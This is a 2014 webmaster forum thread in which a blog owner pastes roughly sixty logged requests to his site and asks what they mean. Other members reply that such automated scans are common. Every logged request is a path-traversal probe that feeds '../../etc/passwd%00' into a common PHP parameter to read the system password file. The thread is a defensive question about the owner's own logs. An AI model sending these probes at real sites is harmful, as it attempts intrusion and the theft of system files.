Hack Attack

ecchi · 2014-11-13, 04:23 AM

Just looked at my stats for yesterday on one of my blogs (http://genuinebondage.com/). There is a whole pile of hits to the main page carrying data for things that simply do not exist on my site. I'm guessing that they think it is Wordpress or similar and are trying to hack into the admin area. It is not, it is a script I wrote myself. But I would like to know what is going on. Can anyone tell from the following details what is happening (the attacks were on the main index page, my stats display everything in the URL after the domain name , IE "/?acion=../../../../../../../../../../etc/passwd%00 - 1" means one hit on http://genuinebondage.com/?acion=../../../../../../../../../../etc/passwd%00 ).

Quote:

/?acion=../../../../../../../../../../etc/passwd%00 - 1
/?act=../../../../../../../../../../etc/passwd%00 - 1
/?action=../../../../../../../../../../etc/passwd%00 - 1
/?API_HOME_DIR=../../../../../../../../../../etc/passwd%00 - 1
/?board=../../../../../../../../../../etc/passwd%00 - 1
/?cat=../../../../../../../../../../etc/passwd%00 - 1
/?client_id=../../../../../../../../../../etc/passwd%00 - 1
/?cmd=../../../../../../../../../../etc/passwd%00 - 1
/?cont=../../../../../../../../../../etc/passwd%00 - 1
/?current_frame=../../../../../../../../../../etc/passwd%00 - 1
/?date=../../../../../../../../../../etc/passwd%00 - 1
/?detail=../../../../../../../../../../etc/passwd%00 - 1
/?dir=../../../../../../../../../../etc/passwd%00 - 1
/?display=../../../../../../../../../../etc/passwd%00 - 1
/?download=../../../../../../../../../../etc/passwd%00 - 1
/?f=../../../../../../../../../../etc/passwd%00 - 1
/?file=../../../../../../../../../../etc/passwd%00 - 1
/?fileinclude=../../../../../../../../../../etc/passwd%00 - 1
/?filename=../../../../../../../../../../etc/passwd%00 - 1
/?firm_id=../../../../../../../../../../etc/passwd%00 - 1
/?g=../../../../../../../../../../etc/passwd%00 - 1
/?getdata=../../../../../../../../../../etc/passwd%00 - 1
/?go=../../../../../../../../../../etc/passwd%00 - 1
/?HT=../../../../../../../../../../etc/passwd%00 - 1
/?idd=../../../../../../../../../../etc/passwd%00 - 1
/?inc=../../../../../../../../../../etc/passwd%00 - 1
/?incfile=../../../../../../../../../../etc/passwd%00 - 1
/?incl=../../../../../../../../../../etc/passwd%00 - 1
/?include_file=../../../../../../../../../../etc/passwd%00 - 1
/?include_path=../../../../../../../../../../etc/passwd%00 - 1
/?infile=../../../../../../../../../../etc/passwd%00 - 1
/?info=../../../../../../../../../../etc/passwd%00 - 1
/?lang=../../../../../../../../../../etc/passwd%00 - 1
/?language=../../../../../../../../../../etc/passwd%00 - 1
/?link=../../../../../../../../../../etc/passwd%00 - 1
/?main=../../../../../../../../../../etc/passwd%00 - 1
/?mainspot=../../../../../../../../../../etc/passwd%00 - 1
/?msg=../../../../../../../../../../etc/passwd%00 - 1
/?num=../../../../../../../../../../etc/passwd%00 - 1
/?openfile=../../../../../../../../../../etc/passwd%00 - 1
/?p=../../../../../../../../../../etc/passwd%00 - 1
/?page=../../../../../../../../../../etc/passwd%00 - 1
/?pagina=../../../../../../../../../../etc/passwd%00 - 1
/?path_to_calendar=../../../../../../../../../../etc/passwd%00 - 1
/?pg=../../../../../../../../../../etc/passwd%00 - 1
/?plik../../../../../../../../../../etc/passwd%00 - 1
/?qry_str=../../../../../../../../../../etc/passwd%00 - 1
/?ruta=../../../../../../../../../../etc/passwd%00 - 1
/?safehtml=../../../../../../../../../../etc/passwd%00 - 1
/?section=../../../../../../../../../../etc/passwd%00 - 1
/?showfile=../../../../../../../../../../etc/passwd%00 - 1
/?side=../../../../../../../../../../etc/passwd%00 - 1
/?site_id=../../../../../../../../../../etc/passwd%00 - 1
/?skin=../../../../../../../../../../etc/passwd%00 - 1
/?static=../../../../../../../../../../etc/passwd%00 - 1
/?strona=../../../../../../../../../../etc/passwd%00 - 1
/?sub=../../../../../../../../../../etc/passwd%00 - 1
/?tresc=../../../../../../../../../../etc/passwd%00 - 1
/?url=../../../../../../../../../../etc/passwd%00 - 1
/?user=../../../../../../../../../../etc/passwd%00 - 1

Cleo · 2014-11-13, 09:05 AM

I see stuff like that on just about all my domains.

housekeeper · 2014-11-14, 02:40 PM

As Cleo said, those are pretty commonplace, but I would say more geared towards pay sites than blogs. To my knowledge they are php generated scripts that are just run randomly, I've never experienced problems with them over the years as they mainly target directories that don't exist, or try to pull random information.

ecchi · 2014-11-18, 03:18 PM

Thanks.

2014-11-13, 09:05 AM	#2
Cleo Subversive filth of the hedonistic decadent West Join Date: Mar 2003 Location: Southeast Florida Posts: 27,936	I see stuff like that on just about all my domains. __________________ Free Rides on Uber and Lyft Uber Car: uberTzTerri Lyft Car: TZ896289

2014-11-14, 02:40 PM	#3
housekeeper Oh! I haven't changed since high school and suddenly I am uncool Join Date: Sep 2009 Location: New York City Posts: 250	As Cleo said, those are pretty commonplace, but I would say more geared towards pay sites than blogs. To my knowledge they are php generated scripts that are just run randomly, I've never experienced problems with them over the years as they mainly target directories that don't exist, or try to pull random information. __________________ Trans-Glam Productions photography - design - video production twitter

2014-11-18, 03:18 PM	#4
ecchi Banned Join Date: Oct 2003 Location: About to be evicted!!!! Posts: 4,082	Thanks.